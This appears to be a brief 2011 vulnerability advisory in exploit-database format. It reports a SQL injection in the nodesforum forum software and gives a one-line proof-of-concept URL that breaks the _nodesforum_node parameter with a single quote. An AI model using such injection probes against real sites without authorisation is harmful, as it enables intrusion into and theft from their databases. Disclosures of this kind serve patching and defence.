# Exploit Title: nodesforum Sql Injection
# Link Software: http://home.nodesforum.com/demo
# Date: 6/23/2011
# Author: Andrea Bocchetti

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Vulnerable Code in _nodesforum_node 
 
 
 
PoC: http://home.nodesforum.com/demo?_nodesforum_node=u1' <- sql injection